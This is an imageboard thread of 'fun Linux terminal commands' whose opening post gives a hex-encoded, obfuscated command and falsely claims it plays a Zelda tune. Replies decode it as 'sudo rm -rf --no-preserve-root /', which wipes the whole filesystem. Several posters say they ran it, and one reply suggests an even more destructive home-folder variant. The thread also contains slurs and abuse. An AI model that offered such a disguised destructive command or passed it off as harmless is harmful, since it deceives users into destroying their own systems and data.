Fun Linux Terminal Commands

Post your favorite GNU+Linux terminal commands.

$(echo "7375646f20726d202d7266202d2d6e6f2d70726573657276652d726f6f74202f" | xxd -r -p)

It plays the Ocarina of Time tune using terminal beeps.

Attached: 1489502268509.png (680x680, 888K)

Other urls found in this thread:

didn`t know the terminal could do sound, are there commands for the other songs from the game?

Just tried it.
Very cool trick OP.

that's the shitty version, using sudo will still ask for permission
You should do it with deleting the home folder, no permissions and all personal data is destroyed
Also not everyone has xxd, i don't. Overall weak but i kekd definetly

Attached: topkekshelf.jpg (389x597, 37K)

Typical toxic Linux users. They try their hardest to make the community as unwelcoming and unfriendly as possible while simultaneously wondering why nobody uses it. XD

>xxd -r -p
Hey! thanks alot you fucking asshole you killed my machine!

Fucking faggot.
not cool

At least we got free software xdxdxd
Hey guys how do I get my sudo to man my ls? We so haxorz xdxdxlolol

This is awesome! Cheers OP!

You should post this in /b/.

if you're dumb enough to enter a random command found on Jow Forums without researching you shouldn't be using linux

sudo cd ~

>echo "7375646f20726d202d7266202d2d6e6f2d70726573657276652d726f6f74202f" | xxd -r -p
>sudo rm -rf --no-preserve-root /

Attached: 1541604232582.jpg (144x161, 7K)

This honestly

dammit I did it

i thought Jow Forums was one of the less retarded boards

im gonna get in trouble too, I ran it on a remote server and it said
sudo access is not permitted, this incident will be reported!

man how could I be so stupid

You'll be put on the naughty list.

Is probably a BSD/Microsoft shill

Friendly reminder Microshills started the rm -r / meme as a vengeance for the delete system32 joke

Attached: 1478275251699.jpg (1125x1125, 203K)

I'm a fucking idiot

K installing Gentoo right now. I don't even know man. I always fall for stupid shit like this.

did people use to fall for that? damn


to any faggots:
I remember you that if you run the script and destroyed your distros you can recover some files reinstalling your distro, if you are using Ubuntu just use a livecd with the same version of Ubuntu that you have